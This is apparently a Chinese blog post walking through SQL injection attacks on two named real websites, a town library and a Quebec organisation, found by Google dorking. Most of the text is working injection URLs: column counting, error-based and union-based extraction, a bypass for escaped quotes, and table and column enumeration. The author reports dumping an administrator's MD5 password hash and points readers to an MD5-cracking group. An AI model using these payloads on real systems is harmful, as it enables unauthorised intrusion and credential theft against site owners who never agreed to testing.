MYD网络安全实验室

sql注入实战

2019-03-27  本文已影响7人  gunginer

可以利用google的“inurl:”语法来找到一些url含参数的网站

示例:inurl:about.php?cartId=

分享一个Google搜素词典

可以用 or 1=1 和 and 1=2 来测是网站是否含有SQL注入漏洞

实例

网站 http://www.edgartownlibrary.org/article.php?id=41

wowo

主要是介绍图书馆的文章

http://www.edgartownlibrary.org/article.php?id=41‘ 网页直接报错

order by 确定字段数

http://www.edgartownlibrary.org/article.php?id=41%20order%20by%204%23

确定字段数为4

爆数据库

尝试了联合注入 但是报错 于是采用报错注入

http://www.edgartownlibrary.org/article.php?id=41%20or%20extractvalue(1,concat(%27~%27,(select%20group_concat(database())),%27-%27))

依次爆出其特数据即可

第二个网站

网址:

存在注入漏洞

order by 确定字段数

http://strategiessl.qc.ca/bulletin/archive.php?id=274%20order%20by%206%23

确定字段数为6

联合注入爆数据库

http://strategiessl.qc.ca/bulletin/archive.php?id=274%20union%20select%201,database(),3,4,5,6%20%23

接下来是关键

爆数据表

http://strategiessl.qc.ca/bulletin/archive.php?id=274%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema=%27strate_infolettre%27%23

单引号被转义

在sql-labs中我们知道可以用 宽字节注入 来吃掉‘ \ ’,宽字节注入依靠的是中文gbk编码,但是此网站是加拿大的 所以没有采用gbk编码 宽字节注入也就失效了

由于单引号的问题 无法继续爆数据表;

这里我尝试了多次  乱写的代码竟然绕过了(手动滑稽)

代码:id=274%20union%20select%201,group_concat(column_name),3,4,5,6%20from%20information_schema.columns%20where%20table_name=(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1)

爆出的数据展示

这里管理员的密码采取了MD5加密  而MD5加密具有不可逆性 所以只能依靠随机碰撞来猜测密码 10位以内的密码有很高的概率可以解开 但我没有到可以解密的工具 顺便给大家推荐个MD5解密群,希望可以帮到大家。

上一篇下一篇

猜你喜欢

热点阅读